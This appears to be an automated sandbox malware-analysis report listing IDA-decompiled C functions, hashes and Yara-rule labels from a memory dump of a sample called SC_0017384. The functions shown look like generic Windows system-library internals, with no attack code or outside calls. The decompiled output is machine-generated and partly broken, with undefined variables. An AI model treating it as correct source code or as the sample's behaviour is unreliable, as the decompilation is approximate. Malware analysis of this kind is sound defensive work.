                                                                              • Instruction ID: 2c15a6d7edf66a6f2ef94db61f2a435629e6c984feefdc800dd5f5913ea42e1a
                                                                              • Opcode Fuzzy Hash: fb9b6ba71aefb5b8c414aa096ea7d82048857fe16f50df3eca8ed8c820003ba7
                                                                              • Instruction Fuzzy Hash: 8D019271A0025CAFCB14DFA8D845EAEBBB8EF44700F504156F915EB280D674DB40CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017658EC Relevance: .0, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 91%
                                                                              			E017658EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x185d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1745c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01765943() != 0 &&  *0x1855320 > 5) {
					E017E7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E017E7B5E( &_v28, _t28);
					_t11 = E017E7B9C(0x1855320, 0x174bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E017AB640(_t11, _t17, _v8 ^ _t29, 0x174bf15, _t27, _t28);
			}















                                                                              0x017658fb
                                                                              0x017658fe
                                                                              0x01765906
                                                                              0x0176590a
                                                                              0x0176593c
                                                                              0x0176593c
                                                                              0x0176590c
                                                                              0x0176590c
                                                                              0x01765911
                                                                              0x00000000
                                                                              0x01765913
                                                                              0x01765913
                                                                              0x01765913
                                                                              0x01765911
                                                                              0x0176591d
                                                                              0x017c1035
                                                                              0x017c103c
                                                                              0x017c103f
                                                                              0x017c1056
                                                                              0x017c1056
                                                                              0x0176593b

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bce03785754eeae3927579e65ebfb0cc92b79af92f244b651434f036920d9f5
                                                                              • Instruction ID: e907499dcfe25a269562388d5abf09471ae9d9b1efea8aceb48921ab7593324e
                                                                              • Opcode Fuzzy Hash: 6bce03785754eeae3927579e65ebfb0cc92b79af92f244b651434f036920d9f5
                                                                              • Instruction Fuzzy Hash: 0101A231A006059BCB14EA69D8089AEF7EDEF86260F9501A99E05D7248EE30EE05C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177B02A Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0177B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01787D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E017E7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                              0x0177b037
                                                                              0x0177b039
                                                                              0x0177b03b
                                                                              0x0177b040
                                                                              0x017ca60e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017ca61d
                                                                              0x0177b04b
                                                                              0x0177b04e
                                                                              0x017ca627
                                                                              0x017ca634
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017ca641
                                                                              0x017ca653
                                                                              0x017ca643
                                                                              0x017ca64c
                                                                              0x017ca64c
                                                                              0x017ca65b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017ca66c
                                                                              0x0177b057
                                                                              0x0177b057
                                                                              0x0177b057
                                                                              0x0177b046
                                                                              0x0177b046
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                              • Instruction ID: 8e0954fccfe4e2138a47b17012edc2a9ff098b8d1297b64006b50d3e8d2f4717
                                                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                              • Instruction Fuzzy Hash: 93018F72300984DFEB27875CC988F66FBD8EF85B50F0900A9FA19CBA51E628DC40C621
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01831074 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01831074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0183165E(__ebx, 0x1858ae4, (__edx -  *0x1858b04 >> 0x14) + (__edx -  *0x1858b04 >> 0x14), __edi, __ecx, (__edx -  *0x1858b04 >> 0x14) + (__edx -  *0x1858b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0182AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01787D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0181FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                              0x01831074
                                                                              0x01831080
                                                                              0x01831082
                                                                              0x0183108a
                                                                              0x0183108f
                                                                              0x01831093
                                                                              0x018310ab
                                                                              0x018310ab
                                                                              0x018310c3
                                                                              0x018310cf
                                                                              0x018310e1
                                                                              0x018310d1
                                                                              0x018310da
                                                                              0x018310da
                                                                              0x018310e9
                                                                              0x018310f5
                                                                              0x018310f5
                                                                              0x018310fe

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c74d573e2b94ed0688cc1f758c29949513f6f46fc1e0488a9b04d9f6abc034c9
                                                                              • Instruction ID: 5588129ad6333a4b9be9653e6b1334e3795f6c085a0375a9ada595dfdb7a6344
                                                                              • Opcode Fuzzy Hash: c74d573e2b94ed0688cc1f758c29949513f6f46fc1e0488a9b04d9f6abc034c9
                                                                              • Instruction Fuzzy Hash: 1F0128726047429BC711EF6DC908B1ABBD9ABC4710F088529F985D3690EE34D644CBE3
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0181FEC0 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E0181FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x185d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                              0x0181fec0
                                                                              0x0181fec0
                                                                              0x0181fecf
                                                                              0x0181fed9
                                                                              0x0181fede
                                                                              0x0181fee0
                                                                              0x0181feeb
                                                                              0x0181fef3
                                                                              0x0181fef6
                                                                              0x0181fef9
                                                                              0x0181ff04
                                                                              0x0181ff16
                                                                              0x0181ff06
                                                                              0x0181ff0f
                                                                              0x0181ff0f
                                                                              0x0181ff21
                                                                              0x0181ff22
                                                                              0x0181ff24
                                                                              0x0181ff29
                                                                              0x0181ff3e

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: da56f8cd6eaeedeb0edc0adb8e1e3c8a6e874834acaa03e04582785e202fa640
                                                                              • Instruction ID: 059675c391f7d6021444a8a5927a0ec65cbf46feb7962076d2f55d2f66b322ce
                                                                              • Opcode Fuzzy Hash: da56f8cd6eaeedeb0edc0adb8e1e3c8a6e874834acaa03e04582785e202fa640
                                                                              • Instruction Fuzzy Hash: F2018471A0021DABDB14DFA9D845FAEBBB8EF85700F404166FA01EB280EA749A41C795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0181FE3F Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E0181FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x185d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                              0x0181fe3f
                                                                              0x0181fe3f
                                                                              0x0181fe4e
                                                                              0x0181fe58
                                                                              0x0181fe5d
                                                                              0x0181fe5f
                                                                              0x0181fe6a
                                                                              0x0181fe72
                                                                              0x0181fe75
                                                                              0x0181fe78
                                                                              0x0181fe83
                                                                              0x0181fe95
                                                                              0x0181fe85
                                                                              0x0181fe8e
                                                                              0x0181fe8e
                                                                              0x0181fea0
                                                                              0x0181fea1
                                                                              0x0181fea3
                                                                              0x0181fea8
                                                                              0x0181febd

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c161be9833ff767befa5ee74747b94c1db8a936585690c39352893e68d436d0c
                                                                              • Instruction ID: 67518f85ada16fbaa2b314747d6191fdd4b1a5754a23ac6087c352028ae3de17
                                                                              • Opcode Fuzzy Hash: c161be9833ff767befa5ee74747b94c1db8a936585690c39352893e68d436d0c
                                                                              • Instruction Fuzzy Hash: 2A018471A00219ABDB14DFA9D845FAEBBB8EF84704F404166FA00EB281DA749A41C7A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838A62 Relevance: .0, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E01838A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x185d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017AB640(E017A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                              0x01838a62
                                                                              0x01838a71
                                                                              0x01838a79
                                                                              0x01838a82
                                                                              0x01838a85
                                                                              0x01838a89
                                                                              0x01838a8c
                                                                              0x01838a8f
                                                                              0x01838a92
                                                                              0x01838a95
                                                                              0x01838a9f
                                                                              0x01838ab1
                                                                              0x01838aa1
                                                                              0x01838aaa
                                                                              0x01838aaa
                                                                              0x01838abc
                                                                              0x01838abd
                                                                              0x01838abf
                                                                              0x01838ac4
                                                                              0x01838ada

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4df44370e19a146d7abdbef6a22b5402a9691d40a6474418d9ad878210aec402
                                                                              • Instruction ID: a52b64b435ad8263a6b23434ccd7a93b7b0813b65753c0bddfc4294824c6b4f7
                                                                              • Opcode Fuzzy Hash: 4df44370e19a146d7abdbef6a22b5402a9691d40a6474418d9ad878210aec402
                                                                              • Instruction Fuzzy Hash: AE017C71A0121DAFCB00DFA8D9459EEFBB8EF88300F50415AFA01E7341E634AA01CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838ED6 Relevance: .0, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E01838ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x185d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01787D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                              0x01838ed6
                                                                              0x01838ee5
                                                                              0x01838eed
                                                                              0x01838ef0
                                                                              0x01838efa
                                                                              0x01838f03
                                                                              0x01838f0c
                                                                              0x01838f15
                                                                              0x01838f24
                                                                              0x01838f27
                                                                              0x01838f31
                                                                              0x01838f43
                                                                              0x01838f33
                                                                              0x01838f3c
                                                                              0x01838f3c
                                                                              0x01838f4e
                                                                              0x01838f4f
                                                                              0x01838f51
                                                                              0x01838f56
                                                                              0x01838f69

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fd109e0cea528236eb22254fc1098d322c4c375ae5a4191f8aa662237e1be4f
                                                                              • Instruction ID: 4e1d2d67450089cde42774926f60d59d81f1b6cc0e1a20c8da27d3bd8e2a2f0d
                                                                              • Opcode Fuzzy Hash: 2fd109e0cea528236eb22254fc1098d322c4c375ae5a4191f8aa662237e1be4f
                                                                              • Instruction Fuzzy Hash: 7911D271A00259DFDB04DFA9D545BADF7F4FF48300F5442A6E519EB741E6349A40CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176DB60 Relevance: .0, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0176DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0176DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0176E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0176E8B0(__ecx, _t14, 0xfff);
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                              0x0176db64
                                                                              0x0176db66
                                                                              0x0176db6b
                                                                              0x0176dbaa
                                                                              0x0176db71
                                                                              0x0176db76
                                                                              0x0176db7a
                                                                              0x0176dba3
                                                                              0x0176db7c
                                                                              0x0176db87
                                                                              0x0176db8b
                                                                              0x017c4fa1
                                                                              0x017c4fb3
                                                                              0x017c4fb8
                                                                              0x0176db91
                                                                              0x0176db96
                                                                              0x0176db98
                                                                              0x0176db98
                                                                              0x0176db8b
                                                                              0x0176db7a
                                                                              0x0176db9d
                                                                              0x0176dba2

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                              • Instruction ID: eb95da477fa2475a9925786316b6798a0d92061079a524d818d35194232658d7
                                                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                              • Instruction Fuzzy Hash: 75F0C8333515239BD3326AD9C884F17FA9E8F92A60F190035BA499B64CCD608C0296E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176B1E1 Relevance: .0, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0176B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01787D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01787D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E017E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                              0x0176b1e8
                                                                              0x0176b1ea
                                                                              0x0176b1f3
                                                                              0x017c4a17
                                                                              0x0176b1f9
                                                                              0x0176b1f9
                                                                              0x0176b1f9
                                                                              0x0176b201
                                                                              0x017c4a21
                                                                              0x017c4a2e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c4a3b
                                                                              0x017c4a4d
                                                                              0x017c4a3d
                                                                              0x017c4a46
                                                                              0x017c4a46
                                                                              0x017c4a55
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176b20a
                                                                              0x0176b20a
                                                                              0x0176b20a
                                                                              0x0176b20a

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                              • Instruction ID: 49eedf1783a41088b4143d46e5c686901ad895e1129ed4a0706a527cf06dd043
                                                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                              • Instruction Fuzzy Hash: 7001AD32244680EFD326966DC808B69FBD8EF52B50F0800A9EE16CB6A2D678C9408224
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FFE87 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 46%
                                                                              			E017FFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x185d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01787D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                              0x017ffe96
                                                                              0x017ffe9e
                                                                              0x017ffea1
                                                                              0x017ffead
                                                                              0x017ffeb3
                                                                              0x017ffeb9
                                                                              0x017ffec3
                                                                              0x017ffed5
                                                                              0x017ffec5
                                                                              0x017ffece
                                                                              0x017ffece
                                                                              0x017ffee0
                                                                              0x017ffee1
                                                                              0x017ffee3
                                                                              0x017ffee8
                                                                              0x017ffefb

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 16bb21b80f3df6ba338ada95439c7e805194045445583de99b539b5a3e619db6
                                                                              • Instruction ID: 691b4bdb35aa30dc6198eec036fc8fd03d17d7058412ca427ae747d075afe544
                                                                              • Opcode Fuzzy Hash: 16bb21b80f3df6ba338ada95439c7e805194045445583de99b539b5a3e619db6
                                                                              • Instruction Fuzzy Hash: DD011271A00209EFCB14DFA8D545A6EB7F4EF18704F54419AE915DB382DA35DA01CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182131B Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 48%
                                                                              			E0182131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x185d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                              0x0182131b
                                                                              0x0182132a
                                                                              0x01821330
                                                                              0x01821336
                                                                              0x0182133e
                                                                              0x01821341
                                                                              0x01821344
                                                                              0x0182134f
                                                                              0x01821361
                                                                              0x01821351
                                                                              0x0182135a
                                                                              0x0182135a
                                                                              0x0182136c
                                                                              0x0182136d
                                                                              0x0182136f
                                                                              0x01821374
                                                                              0x01821387

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2a99e021cdb0eab6ab7a042a488f20081ba3fea6c132fbc158776f681fb4a1e4
                                                                              • Instruction ID: 57dca5b16b11a542c0abe83f5fdf95faff4a718709efabc3d0ab9bc00d5a29a2
                                                                              • Opcode Fuzzy Hash: 2a99e021cdb0eab6ab7a042a488f20081ba3fea6c132fbc158776f681fb4a1e4
                                                                              • Instruction Fuzzy Hash: AF011971A01259AFCB04EFA9D549AAEB7F4EF58700F50415AF905EB381E6349A40CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838F6A Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 48%
                                                                              			E01838F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x185d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                              0x01838f6a
                                                                              0x01838f79
                                                                              0x01838f81
                                                                              0x01838f84
                                                                              0x01838f8b
                                                                              0x01838f91
                                                                              0x01838f94
                                                                              0x01838f9e
                                                                              0x01838fb0
                                                                              0x01838fa0
                                                                              0x01838fa9
                                                                              0x01838fa9
                                                                              0x01838fbb
                                                                              0x01838fbc
                                                                              0x01838fbe
                                                                              0x01838fc3
                                                                              0x01838fd6

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
